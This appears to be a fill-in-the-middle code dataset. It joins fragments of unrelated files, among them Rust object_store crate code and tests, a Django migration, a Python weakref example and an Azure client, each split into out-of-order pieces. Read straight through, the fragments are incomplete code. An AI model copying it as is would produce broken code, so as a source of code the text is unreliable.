"Cannot import module when trying to load type `{}`.".format(class_obj)
)
except AttributeError:
raise DataSetError("Class `{}` not found.".format(class_obj))
if not issubclass(class_obj, AbstractDataSet):
raise DataSetError(
"DataSet type `{}.{}` is invalid: all data set types must extend "
"`AbstractDataSet`.".format(class_obj.__module__, class_obj.__qualname__)
)
if VERSION_KEY in config:
# remove "version" key so that it's not passed
# to the "unversioned" data set constructor
message = (
"`%s` attribute removed from data set configuration since it is a "
"reserved word and cannot be directly specified"
)
logging.getLogger(__name__).warning(message, VERSION_KEY)
del config[VERSION_KEY]
if config.pop(VERSIONED_FLAG_KEY, False): # data set is versioned
config[VERSION_KEY] = Version(load_version, save_version)
return class_obj, config |
lib.rs | //pub mod sha2;
//pub mod hmac; | //pub mod salsa20;
//pub mod chacha20poly1305;
pub mod ed25519;
//pub mod curve25519;
//pub mod nacl; | //pub mod poly1305;
//pub mod chacha20; |
lib.rs | #![deny(rustdoc::broken_intra_doc_links, rustdoc::bare_urls, rust_2018_idioms)]
#![warn(
missing_copy_implementations,
missing_debug_implementations,
missing_docs,
clippy::explicit_iter_loop,
clippy::future_not_send,
clippy::use_self,
clippy::clone_on_ref_ptr
)]
//! # object_store
//!
//! This crate provides APIs for interacting with object storage services. It
//! currently supports PUT, GET, DELETE, and list for Google Cloud Storage,
//! Amazon S3, Microsoft Azure Blob storage, in-memory and local file storage.
//!
//! Future compatibility will include Minio and Ceph.
#[cfg(feature = "aws")]
mod aws;
#[cfg(feature = "azure")]
mod azure;
mod buffer;
mod disk;
#[cfg(feature = "gcp")]
mod gcp;
mod memory;
pub mod path;
mod throttle;
pub mod cache;
pub mod dummy;
#[cfg(not(feature = "aws"))]
use dummy as aws;
#[cfg(not(feature = "azure"))]
use dummy as azure;
#[cfg(not(feature = "gcp"))]
use dummy as gcp;
use aws::AmazonS3;
use azure::MicrosoftAzure;
use disk::File;
use gcp::GoogleCloudStorage;
use memory::InMemory;
use path::{parsed::DirsAndFileName, ObjectStorePath};
use throttle::ThrottledStore;
/// Publicly expose throttling configuration
pub use throttle::ThrottleConfig;
use crate::{
cache::{Cache, LocalFSCache},
path::Path,
};
use async_trait::async_trait;
use bytes::Bytes;
use chrono::{DateTime, Utc};
use futures::{stream::BoxStream, StreamExt, TryFutureExt, TryStreamExt};
use snafu::{ResultExt, Snafu};
use std::{fmt::Formatter, num::NonZeroUsize};
use std::{path::PathBuf, sync::Arc};
/// Universal API to multiple object store services.
#[async_trait]
pub trait ObjectStoreApi: Send + Sync + 'static {
/// The type of the locations used in interacting with this object store.
type Path: path::ObjectStorePath;
/// The error returned from fallible methods
type Error: std::error::Error + Send + Sync + 'static;
/// Return a new location path appropriate for this object storage
fn new_path(&self) -> Self::Path;
/// Return a new location path constructed from a string appropriate for this object storage
fn path_from_raw(&self, raw: &str) -> Self::Path;
/// Save the provided bytes to the specified location.
async fn put(&self, location: &Self::Path, bytes: Bytes) -> Result<(), Self::Error>;
/// Return the bytes that are stored at the specified location.
async fn get(&self, location: &Self::Path) -> Result<GetResult<Self::Error>, Self::Error>;
/// Delete the object at the specified location.
async fn delete(&self, location: &Self::Path) -> Result<(), Self::Error>;
/// List all the objects with the given prefix.
///
/// Prefixes are evaluated on a path segment basis, i.e. `foo/bar/` is a prefix of `foo/bar/x` but not of
/// `foo/bar_baz/x`.
async fn list<'a>(
&'a self,
prefix: Option<&'a Self::Path>,
) -> Result<BoxStream<'a, Result<Vec<Self::Path>, Self::Error>>, Self::Error>;
/// List objects with the given prefix and an implementation specific
/// delimiter. Returns common prefixes (directories) in addition to object
/// metadata.
///
/// Prefixes are evaluated on a path segment basis, i.e. `foo/bar/` is a prefix of `foo/bar/x` but not of
/// `foo/bar_baz/x`.
async fn list_with_delimiter(
&self,
prefix: &Self::Path,
) -> Result<ListResult<Self::Path>, Self::Error>;
}
/// Universal interface to multiple object store services.
#[derive(Debug)]
pub struct ObjectStore {
/// The object store
pub integration: ObjectStoreIntegration,
cache: Option<ObjectStoreFileCache>,
}
impl ObjectStore {
/// Configure a connection to Amazon S3.
pub fn new_amazon_s3(
access_key_id: Option<impl Into<String>>,
secret_access_key: Option<impl Into<String>>,
region: impl Into<String>,
bucket_name: impl Into<String>,
endpoint: Option<impl Into<String>>,
session_token: Option<impl Into<String>>,
max_connections: NonZeroUsize,
) -> Result<Self> {
let s3 = aws::new_s3(
access_key_id,
secret_access_key,
region,
bucket_name,
endpoint,
session_token,
max_connections,
)?;
Ok(Self {
integration: ObjectStoreIntegration::AmazonS3(s3),
cache: None,
})
}
/// Configure a connection to Google Cloud Storage.
pub fn new_google_cloud_storage(
service_account_path: impl AsRef<std::ffi::OsStr>,
bucket_name: impl Into<String>,
) -> Result<Self> {
let gcs = gcp::new_gcs(service_account_path, bucket_name)?;
Ok(Self {
integration: ObjectStoreIntegration::GoogleCloudStorage(gcs),
cache: None,
})
}
/// Configure in-memory storage.
pub fn new_in_memory() -> Self {
let in_mem = InMemory::new();
Self {
integration: ObjectStoreIntegration::InMemory(in_mem),
cache: None,
}
}
/// For Testing: Configure throttled in-memory storage.
pub fn new_in_memory_throttled(config: ThrottleConfig) -> Self {
let in_mem = InMemory::new();
let in_mem_throttled = ThrottledStore::new(in_mem, config);
Self {
integration: ObjectStoreIntegration::InMemoryThrottled(in_mem_throttled),
cache: None,
}
}
    /// For Testing: Configure an object store with invalid credentials
/// that will always fail on operations (hopefully)
pub fn new_failing_store() -> Result<Self> {
let s3 = aws::new_failing_s3()?;
Ok(Self {
integration: ObjectStoreIntegration::AmazonS3(s3),
cache: None,
})
}
/// Configure local file storage, rooted at `root`
pub fn new_file(root: impl Into<PathBuf>) -> Self {
let file = File::new(root);
Self {
integration: ObjectStoreIntegration::File(file),
cache: None,
}
}
/// Configure a connection to Microsoft Azure Blob store.
pub fn new_microsoft_azure(
account: impl Into<String>,
access_key: impl Into<String>,
container_name: impl Into<String>,
use_emulator: bool,
) -> Result<Self> {
let azure = azure::new_azure(account, access_key, container_name, use_emulator)?;
Ok(Self {
integration: ObjectStoreIntegration::MicrosoftAzure(Box::new(azure)),
cache: None,
})
}
/// Create implementation-specific path from parsed representation.
pub fn path_from_dirs_and_filename(&self, path: DirsAndFileName) -> path::Path {
use ObjectStoreIntegration::*;
match &self.integration {
AmazonS3(_) => path::Path::AmazonS3(path.into()),
GoogleCloudStorage(_) => path::Path::GoogleCloudStorage(path.into()),
InMemory(_) => path::Path::InMemory(path),
InMemoryThrottled(_) => path::Path::InMemory(path),
File(_) => path::Path::File(path.into()),
MicrosoftAzure(_) => path::Path::MicrosoftAzure(path.into()),
}
}
/// Returns the filesystem cache if configured
pub fn cache(&self) -> &Option<ObjectStoreFileCache> {
&self.cache
}
}
#[async_trait]
impl ObjectStoreApi for ObjectStore {
type Path = path::Path;
type Error = Error;
fn new_path(&self) -> Self::Path {
use ObjectStoreIntegration::*;
match &self.integration {
AmazonS3(s3) => path::Path::AmazonS3(s3.new_path()),
GoogleCloudStorage(gcs) => path::Path::GoogleCloudStorage(gcs.new_path()),
InMemory(in_mem) => path::Path::InMemory(in_mem.new_path()),
InMemoryThrottled(in_mem_throttled) => {
path::Path::InMemory(in_mem_throttled.new_path())
}
File(file) => path::Path::File(file.new_path()),
MicrosoftAzure(azure) => path::Path::MicrosoftAzure(azure.new_path()),
}
}
fn path_from_raw(&self, raw: &str) -> Self::Path {
use ObjectStoreIntegration::*;
match &self.integration {
AmazonS3(s3) => path::Path::AmazonS3(s3.path_from_raw(raw)),
GoogleCloudStorage(gcs) => path::Path::GoogleCloudStorage(gcs.path_from_raw(raw)),
InMemory(in_mem) => path::Path::InMemory(in_mem.path_from_raw(raw)),
InMemoryThrottled(in_mem_throttled) => {
path::Path::InMemory(in_mem_throttled.path_from_raw(raw))
}
File(file) => path::Path::File(file.path_from_raw(raw)),
MicrosoftAzure(azure) => path::Path::MicrosoftAzure(azure.path_from_raw(raw)),
}
}
async fn put(&self, location: &Self::Path, bytes: Bytes) -> Result<()> {
use ObjectStoreIntegration::*;
match (&self.integration, location) {
(AmazonS3(s3), path::Path::AmazonS3(location)) => s3.put(location, bytes).await?,
(GoogleCloudStorage(gcs), path::Path::GoogleCloudStorage(location)) => gcs
.put(location, bytes)
.await
.context(GcsObjectStoreSnafu)?,
(InMemory(in_mem), path::Path::InMemory(location)) => {
in_mem.put(location, bytes).await?
}
(InMemoryThrottled(in_mem_throttled), path::Path::InMemory(location)) => {
in_mem_throttled.put(location, bytes).await?
}
(File(file), path::Path::File(location)) => file
.put(location, bytes)
.await
.context(FileObjectStoreSnafu)?,
(MicrosoftAzure(azure), path::Path::MicrosoftAzure(location)) => {
azure.put(location, bytes).await?
}
_ => unreachable!(),
}
Ok(())
}
async fn get(&self, location: &Self::Path) -> Result<GetResult<Error>> {
use ObjectStoreIntegration::*;
Ok(match (&self.integration, location) {
(AmazonS3(s3), path::Path::AmazonS3(location)) => s3.get(location).await?.err_into(),
(GoogleCloudStorage(gcs), path::Path::GoogleCloudStorage(location)) => {
gcs.get(location).await?.err_into()
}
(InMemory(in_mem), path::Path::InMemory(location)) => {
in_mem.get(location).await?.err_into()
}
(InMemoryThrottled(in_mem_throttled), path::Path::InMemory(location)) => {
in_mem_throttled.get(location).await?.err_into()
}
(File(file), path::Path::File(location)) => file.get(location).await?.err_into(),
(MicrosoftAzure(azure), path::Path::MicrosoftAzure(location)) => {
azure.get(location).await?.err_into()
}
_ => unreachable!(),
})
}
async fn delete(&self, location: &Self::Path) -> Result<()> {
use ObjectStoreIntegration::*;
match (&self.integration, location) {
(AmazonS3(s3), path::Path::AmazonS3(location)) => s3.delete(location).await?,
(GoogleCloudStorage(gcs), path::Path::GoogleCloudStorage(location)) => {
gcs.delete(location).await?
}
(InMemory(in_mem), path::Path::InMemory(location)) => in_mem.delete(location).await?,
(InMemoryThrottled(in_mem_throttled), path::Path::InMemory(location)) => {
in_mem_throttled.delete(location).await?
}
(File(file), path::Path::File(location)) => file.delete(location).await?,
(MicrosoftAzure(azure), path::Path::MicrosoftAzure(location)) => {
azure.delete(location).await?
}
_ => unreachable!(),
}
Ok(())
}
async fn list<'a>(
&'a self,
prefix: Option<&'a Self::Path>,
) -> Result<BoxStream<'a, Result<Vec<Self::Path>>>> {
use ObjectStoreIntegration::*;
Ok(match (&self.integration, prefix) {
(AmazonS3(s3), Some(path::Path::AmazonS3(prefix))) => s3
.list(Some(prefix))
.await?
.map_ok(|s| s.into_iter().map(path::Path::AmazonS3).collect())
.err_into()
.boxed(),
(AmazonS3(s3), None) => s3
.list(None)
.await?
.map_ok(|s| s.into_iter().map(path::Path::AmazonS3).collect())
.err_into()
.boxed(),
(GoogleCloudStorage(gcs), Some(path::Path::GoogleCloudStorage(prefix))) => gcs
.list(Some(prefix))
.await?
.map_ok(|s| s.into_iter().map(path::Path::GoogleCloudStorage).collect())
.err_into()
.boxed(),
(GoogleCloudStorage(gcs), None) => gcs
.list(None)
.await?
.map_ok(|s| s.into_iter().map(path::Path::GoogleCloudStorage).collect())
.err_into()
.boxed(),
(InMemory(in_mem), Some(path::Path::InMemory(prefix))) => in_mem
.list(Some(prefix))
.await?
.map_ok(|s| s.into_iter().map(path::Path::InMemory).collect())
.err_into()
.boxed(),
(InMemory(in_mem), None) => in_mem
.list(None)
.await?
.map_ok(|s| s.into_iter().map(path::Path::InMemory).collect())
.err_into()
.boxed(),
(InMemoryThrottled(in_mem_throttled), Some(path::Path::InMemory(prefix))) => {
in_mem_throttled
.list(Some(prefix))
.await?
.map_ok(|s| s.into_iter().map(path::Path::InMemory).collect())
.err_into()
.boxed()
}
(InMemoryThrottled(in_mem_throttled), None) => in_mem_throttled
.list(None)
.await?
.map_ok(|s| s.into_iter().map(path::Path::InMemory).collect())
.err_into()
.boxed(),
(File(file), Some(path::Path::File(prefix))) => file
.list(Some(prefix))
.await?
.map_ok(|s| s.into_iter().map(path::Path::File).collect())
.err_into()
.boxed(),
(File(file), None) => file
.list(None)
.await?
.map_ok(|s| s.into_iter().map(path::Path::File).collect())
.err_into()
.boxed(),
(MicrosoftAzure(azure), Some(path::Path::MicrosoftAzure(prefix))) => azure
.list(Some(prefix))
.await?
.map_ok(|s| s.into_iter().map(path::Path::MicrosoftAzure).collect())
.err_into()
.boxed(),
(MicrosoftAzure(azure), None) => azure
.list(None)
.await?
.map_ok(|s| s.into_iter().map(path::Path::MicrosoftAzure).collect())
.err_into()
.boxed(),
_ => unreachable!(),
})
}
async fn list_with_delimiter(&self, prefix: &Self::Path) -> Result<ListResult<Self::Path>> {
use ObjectStoreIntegration::*;
match (&self.integration, prefix) {
(AmazonS3(s3), path::Path::AmazonS3(prefix)) => s3
.list_with_delimiter(prefix)
.map_ok(|list_result| list_result.map_paths(path::Path::AmazonS3))
.await
.context(AwsObjectStoreSnafu),
(GoogleCloudStorage(gcs), path::Path::GoogleCloudStorage(prefix)) => gcs
.list_with_delimiter(prefix)
.map_ok(|list_result| list_result.map_paths(path::Path::GoogleCloudStorage))
.await
.context(GcsObjectStoreSnafu),
(InMemory(in_mem), path::Path::InMemory(prefix)) => in_mem
.list_with_delimiter(prefix)
.map_ok(|list_result| list_result.map_paths(path::Path::InMemory))
.await
.context(InMemoryObjectStoreSnafu),
(InMemoryThrottled(in_mem_throttled), path::Path::InMemory(prefix)) => in_mem_throttled
.list_with_delimiter(prefix)
.map_ok(|list_result| list_result.map_paths(path::Path::InMemory))
.await
.context(InMemoryObjectStoreSnafu),
(File(file), path::Path::File(prefix)) => file
.list_with_delimiter(prefix)
.map_ok(|list_result| list_result.map_paths(path::Path::File))
.await
.context(FileObjectStoreSnafu),
(MicrosoftAzure(azure), path::Path::MicrosoftAzure(prefix)) => azure
.list_with_delimiter(prefix)
.map_ok(|list_result| list_result.map_paths(path::Path::MicrosoftAzure))
.await
.context(AzureObjectStoreSnafu),
_ => unreachable!(),
}
}
}
/// All supported object storage integrations
#[derive(Debug)]
pub enum ObjectStoreIntegration {
/// GCP storage
GoogleCloudStorage(GoogleCloudStorage),
/// Amazon storage
AmazonS3(AmazonS3),
/// In memory storage for testing
InMemory(InMemory),
/// Throttled in memory storage for testing
InMemoryThrottled(ThrottledStore<InMemory>),
/// Local file system storage
File(File),
/// Microsoft Azure Blob storage
MicrosoftAzure(Box<MicrosoftAzure>),
}
/// Cache wrapper so local file object store can pass through to its implementation
/// while others use the `LocalFSCache`.
#[derive(Debug)]
pub enum ObjectStoreFileCache {
/// If using the local filesystem for object store, don't create additional copies for caching
Passthrough(File),
/// Remote object stores should use the LocalFSCache implementation
File(LocalFSCache),
}
#[async_trait]
impl Cache for ObjectStoreFileCache {
fn evict(&self, path: &Path) -> crate::cache::Result<()> {
match &self {
Self::Passthrough(f) => f.evict(path),
Self::File(f) => f.evict(path),
}
}
async fn fs_path_or_cache(
&self,
path: &Path,
store: Arc<ObjectStore>,
) -> crate::cache::Result<&str> {
match &self {
Self::Passthrough(f) => f.fs_path_or_cache(path, store).await,
Self::File(f) => f.fs_path_or_cache(path, store).await,
}
}
fn size(&self) -> u64 {
match &self {
Self::Passthrough(f) => f.size(),
Self::File(f) => f.size(),
}
}
fn limit(&self) -> u64 {
match &self {
            Self::Passthrough(f) => f.limit(),
            Self::File(f) => f.limit(),
}
}
}
/// Result of a list call that includes objects, prefixes (directories) and a
/// token for the next set of results. Individual result sets may be limited to
/// 1,000 objects based on the underlying object storage's limitations.
#[derive(Debug)]
pub struct ListResult<P: ObjectStorePath> {
/// Token passed to the API for the next page of list results.
pub next_token: Option<String>,
/// Prefixes that are common (like directories)
pub common_prefixes: Vec<P>,
/// Object metadata for the listing
pub objects: Vec<ObjectMeta<P>>,
}
#[allow(clippy::use_self)] // https://github.com/rust-lang/rust-clippy/issues/3410
impl<P: ObjectStorePath> ListResult<P> {
/// `c` is a function that can turn one type that implements an
/// `ObjectStorePath` to another type that also implements
/// `ObjectStorePath`.
fn map_paths<Q: ObjectStorePath, C>(self, c: C) -> ListResult<Q>
where
C: Fn(P) -> Q,
{
let Self {
next_token,
common_prefixes,
objects,
} = self;
ListResult {
next_token,
common_prefixes: common_prefixes.into_iter().map(&c).collect(),
objects: objects.into_iter().map(|o| o.map_paths(&c)).collect(),
}
}
}
/// The metadata that describes an object.
#[derive(Debug)]
pub struct ObjectMeta<P: ObjectStorePath> {
/// The full path to the object
pub location: P,
/// The last modified time
pub last_modified: DateTime<Utc>,
/// The size in bytes of the object
pub size: usize,
}
#[allow(clippy::use_self)] // https://github.com/rust-lang/rust-clippy/issues/3410
impl<P: ObjectStorePath> ObjectMeta<P> {
/// `c` is a function that can turn one type that implements an
/// `ObjectStorePath` to another type that also implements
/// `ObjectStorePath`.
fn map_paths<Q: ObjectStorePath, C>(self, c: C) -> ObjectMeta<Q>
where
C: Fn(P) -> Q,
{
let Self {
location,
last_modified,
size,
} = self;
ObjectMeta {
location: c(location),
last_modified,
size,
}
}
}
/// Result for a get request
pub enum GetResult<E> {
/// A file
File(tokio::fs::File, std::path::PathBuf),
/// An asynchronous stream
Stream(BoxStream<'static, Result<Bytes, E>>),
}
impl<E> std::fmt::Debug for GetResult<E> {
fn fmt(&self, f: &mut Formatter<'_>) -> std::fmt::Result {
match self {
GetResult::File(_, _) => write!(f, "GetResult(File)"),
GetResult::Stream(_) => write!(f, "GetResult(Stream)"),
}
}
}
impl GetResult<Error> {
/// Collects the data into a [`Vec<u8>`]
pub async fn bytes(self) -> Result<Vec<u8>, Error> {
let mut stream = self.into_stream();
let mut bytes = Vec::new();
while let Some(next) = stream.next().await {
bytes.extend_from_slice(next?.as_ref())
}
Ok(bytes)
}
/// Converts this into a byte stream
pub fn into_stream(self) -> BoxStream<'static, Result<Bytes, Error>> {
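        // Both variants become a stream of `Bytes`: a file is wrapped in a
        // `FramedRead` with `BytesCodec`, and read failures are mapped to disk errors.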
match self {
Self::File(file, path) => {
tokio_util::codec::FramedRead::new(file, tokio_util::codec::BytesCodec::new())
.map_ok(|b| b.freeze())
.map_err(move |source| Error::FileObjectStoreError {
source: disk::Error::UnableToReadBytes {
source,
path: path.clone(),
},
})
.boxed()
}
Self::Stream(s) => s,
}
}
}
impl<E: 'static> GetResult<E> {
/// Maps the error
fn err_into<T: From<E> + 'static>(self) -> GetResult<T> {
match self {
Self::File(f, p) => GetResult::File(f, p),
Self::Stream(s) => GetResult::Stream(s.err_into().boxed()),
}
}
}
/// A specialized `Result` for object store-related errors
pub type Result<T, E = Error> = std::result::Result<T, E>;
/// A specialized `Error` for object store-related errors
#[derive(Debug, Snafu)]
#[allow(missing_docs)]
pub enum Error {
#[snafu(display("File-based Object Store error: {}", source))]
FileObjectStoreError { source: disk::Error },
#[snafu(display("Google Cloud Storage-based Object Store error: {}", source))]
GcsObjectStoreError { source: gcp::Error },
#[snafu(display("AWS S3-based Object Store error: {}", source))]
AwsObjectStoreError { source: aws::Error },
#[snafu(display("Azure Blob storage-based Object Store error: {}", source))]
AzureObjectStoreError { source: azure::Error },
#[snafu(display("In-memory-based Object Store error: {}", source))]
InMemoryObjectStoreError { source: memory::Error },
#[snafu(display("{}", source))]
DummyObjectStoreError { source: dummy::Error },
#[snafu(display("Object at location {} not found: {}", path, source))]
NotFound {
path: String,
source: Box<dyn std::error::Error + Send + Sync + 'static>,
},
}
impl From<disk::Error> for Error {
fn from(source: disk::Error) -> Self {
match source {
disk::Error::NotFound { path, source } => Self::NotFound {
path,
source: source.into(),
},
_ => Self::FileObjectStoreError { source },
}
}
}
#[cfg(feature = "gcp")]
impl From<gcp::Error> for Error {
fn from(source: gcp::Error) -> Self {
match source {
gcp::Error::NotFound { path, source } => Self::NotFound {
path,
source: source.into(),
},
_ => Self::GcsObjectStoreError { source },
}
}
}
#[cfg(feature = "aws")]
impl From<aws::Error> for Error {
fn from(source: aws::Error) -> Self {
match source {
aws::Error::NotFound { path, source } => Self::NotFound {
path,
source: source.into(),
},
_ => Self::AwsObjectStoreError { source },
}
}
}
#[cfg(feature = "azure")]
impl From<azure::Error> for Error {
fn from(source: azure::Error) -> Self {
Self::AzureObjectStoreError { source }
}
}
impl From<memory::Error> for Error {
fn from(source: memory::Error) -> Self {
match source {
memory::Error::NoDataInMemory { ref path } => Self::NotFound {
path: path.into(),
source: source.into(),
},
// currently "not found" is the only error that can happen with the in-memory store
}
}
}
impl From<dummy::Error> for Error {
fn from(source: dummy::Error) -> Self {
Self::DummyObjectStoreError { source }
}
}
#[cfg(test)]
mod tests {
use super::*;
use crate::path::{cloud::CloudPath, parsed::DirsAndFileName, ObjectStorePath};
use futures::stream;
type Error = Box<dyn std::error::Error + Send + Sync + 'static>;
type Result<T, E = Error> = std::result::Result<T, E>;
async fn flatten_list_stream(
storage: &ObjectStore,
prefix: Option<&path::Path>,
) -> Result<Vec<path::Path>> {
storage
.list(prefix)
.await?
.map_ok(|v| stream::iter(v).map(Ok))
.try_flatten()
.try_collect()
.await
}
pub(crate) async fn put_get_delete_list(storage: &ObjectStore) -> Result<()> {
delete_fixtures(storage).await;
let content_list = flatten_list_stream(storage, None).await?;
assert!(
content_list.is_empty(),
"Expected list to be empty; found: {:?}",
content_list
);
let mut location = storage.new_path();
location.push_dir("test_dir");
location.set_file_name("test_file.json");
let data = Bytes::from("arbitrary data");
let expected_data = data.clone();
storage.put(&location, data).await?;
// List everything
let content_list = flatten_list_stream(storage, None).await?;
assert_eq!(content_list, &[location.clone()]);
// List everything starting with a prefix that should return results
let mut prefix = storage.new_path();
prefix.push_dir("test_dir");
let content_list = flatten_list_stream(storage, Some(&prefix)).await?;
assert_eq!(content_list, &[location.clone()]);
// List everything starting with a prefix that shouldn't return results
let mut prefix = storage.new_path();
prefix.push_dir("something");
let content_list = flatten_list_stream(storage, Some(&prefix)).await?;
assert!(content_list.is_empty());
let read_data = storage.get(&location).await?.bytes().await?;
assert_eq!(&*read_data, expected_data);
storage.delete(&location).await?;
let content_list = flatten_list_stream(storage, None).await?;
assert!(content_list.is_empty());
Ok(())
}
pub(crate) async fn list_uses_directories_correctly(storage: &ObjectStore) -> Result<()> |
pub(crate) async fn list_with_delimiter(storage: &ObjectStore) -> Result<()> {
delete_fixtures(storage).await;
// ==================== check: store is empty ====================
let content_list = flatten_list_stream(storage, None).await?;
assert!(content_list.is_empty());
// ==================== do: create files ====================
let data = Bytes::from("arbitrary data");
let files: Vec<_> = [
"test_file",
"mydb/wb/000/000/000.segment",
"mydb/wb/000/000/001.segment",
"mydb/wb/000/000/002.segment",
"mydb/wb/001/001/000.segment",
"mydb/wb/foo.json",
"mydb/wbwbwb/111/222/333.segment",
"mydb/data/whatevs",
]
.iter()
.map(|&s| str_to_path(storage, s))
.collect();
for f in &files {
let data = data.clone();
storage.put(f, data).await.unwrap();
}
// ==================== check: prefix-list `mydb/wb` (directory) ====================
let mut prefix = storage.new_path();
prefix.push_all_dirs(&["mydb", "wb"]);
let mut expected_000 = prefix.clone();
expected_000.push_dir("000");
let mut expected_001 = prefix.clone();
expected_001.push_dir("001");
let mut expected_location = prefix.clone();
expected_location.set_file_name("foo.json");
let result = storage.list_with_delimiter(&prefix).await.unwrap();
assert_eq!(result.common_prefixes, vec![expected_000, expected_001]);
assert_eq!(result.objects.len(), 1);
let object = &result.objects[0];
assert_eq!(object.location, expected_location);
assert_eq!(object.size, data.len());
// ==================== check: prefix-list `mydb/wb/000/000/001` (partial filename doesn't match) ====================
let mut prefix = storage.new_path();
prefix.push_all_dirs(&["mydb", "wb", "000", "000"]);
prefix.set_file_name("001");
let mut expected_location = storage.new_path();
expected_location.push_all_dirs(&["mydb", "wb", "000", "000"]);
expected_location.set_file_name("001.segment");
let result = storage.list_with_delimiter(&prefix).await.unwrap();
assert!(result.common_prefixes.is_empty());
assert_eq!(result.objects.len(), 0);
// ==================== check: prefix-list `not_there` (non-existing prefix) ====================
let mut prefix = storage.new_path();
prefix.push_all_dirs(&["not_there"]);
let result = storage.list_with_delimiter(&prefix).await.unwrap();
assert!(result.common_prefixes.is_empty());
assert!(result.objects.is_empty());
// ==================== do: remove all files ====================
for f in &files {
storage.delete(f).await.unwrap();
}
// ==================== check: store is empty ====================
let content_list = flatten_list_stream(storage, None).await?;
assert!(content_list.is_empty());
Ok(())
}
#[allow(dead_code)]
pub(crate) async fn get_nonexistent_object(
storage: &ObjectStore,
location: Option<<ObjectStore as ObjectStoreApi>::Path>,
) -> Result<Vec<u8>> {
let location = location.unwrap_or_else(|| {
let mut loc = storage.new_path();
loc.set_file_name("this_file_should_not_exist");
loc
});
let content_list = flatten_list_stream(storage, Some(&location)).await?;
assert!(content_list.is_empty());
Ok(storage.get(&location).await?.bytes().await?)
}
    /// Parse a str as a `CloudPath` into a `DirsAndFileName`, even though the
/// associated storage might not be cloud storage, to reuse the cloud
/// path parsing logic. Then convert into the correct type of path for
/// the given storage.
fn str_to_path(storage: &ObjectStore, val: &str) -> path::Path {
let cloud_path = CloudPath::raw(val);
let parsed: DirsAndFileName = cloud_path.into();
let mut new_path = storage.new_path();
for part in parsed.directories {
new_path.push_dir(part.to_string());
}
if let Some(file_name) = parsed.file_name {
new_path.set_file_name(file_name.to_string());
}
new_path
}
async fn delete_fixtures(storage: &ObjectStore) {
let files: Vec<_> = [
"test_file",
"test_dir/test_file.json",
"mydb/wb/000/000/000.segment",
"mydb/wb/000/000/001.segment",
"mydb/wb/000/000/002.segment",
"mydb/wb/001/001/000.segment",
"mydb/wb/foo.json",
"mydb/data/whatevs",
"mydb/wbwbwb/111/222/333.segment",
"foo/x.json",
"foo.bar/y.json",
]
.iter()
.map(|&s| str_to_path(storage, s))
.collect();
for f in &files {
// don't care if it errors, should fail elsewhere
let _ = storage.delete(f).await;
}
}
// Tests TODO:
// GET nonexisting location (in_memory/file)
// DELETE nonexisting location
// PUT overwriting
}
| {
delete_fixtures(storage).await;
let content_list = flatten_list_stream(storage, None).await?;
assert!(
content_list.is_empty(),
"Expected list to be empty; found: {:?}",
content_list
);
let mut location1 = storage.new_path();
location1.push_dir("foo");
location1.set_file_name("x.json");
let mut location2 = storage.new_path();
location2.push_dir("foo.bar");
location2.set_file_name("y.json");
let data = Bytes::from("arbitrary data");
storage.put(&location1, data.clone()).await?;
storage.put(&location2, data).await?;
let mut prefix = storage.new_path();
prefix.push_dir("foo");
let content_list = flatten_list_stream(storage, Some(&prefix)).await?;
assert_eq!(content_list, &[location1.clone()]);
let mut prefix = storage.new_path();
prefix.push_dir("foo");
prefix.set_file_name("x");
let content_list = flatten_list_stream(storage, Some(&prefix)).await?;
assert_eq!(content_list, &[]);
Ok(())
} |
weakref_ref.py | #
"""Example using weakref.ref to manage a reference to an object.
"""
# end_pymotw_header
import weakref
class ExpensiveObject:
def __del__(self):
print("(Deleting {})".format(self))
obj = ExpensiveObject() |
print("obj:", obj)
print("ref:", r)
print("r():", r())
print("deleting obj")
del obj
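# After obj is deleted the weak reference is dead, so r() returns None.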
print("r():", r()) | r = weakref.ref(obj) |
0024_auto_20200311_0154.py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2020-03-11 01:54
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class | (migrations.Migration):
dependencies = [
('shop', '0023_auto_20200311_0137'),
]
operations = [
migrations.AlterField(
model_name='product',
name='type1',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='products_t', to='shop.Type1'),
),
]
| Migration |
usage_operations.py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from .. import models
class UsageOperations(object):
"""UsageOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Client Api Version. Constant value: "2017-10-01".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2017-10-01"
self.config = config
def list(
self, custom_headers=None, raw=False, **operation_config):
"""Gets the current usage count and the limit for the resources under the
subscription.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of Usage
:rtype:
~azure.mgmt.storage.v2017_10_01.models.UsagePaged[~azure.mgmt.storage.v2017_10_01.models.Usage]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def | (next_link=None, raw=False):
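            # First call: build the request URL from the subscription id.
            # Subsequent calls simply follow the service-provided next_link.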
if not next_link:
# Construct URL
url = self.list.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.UsagePaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
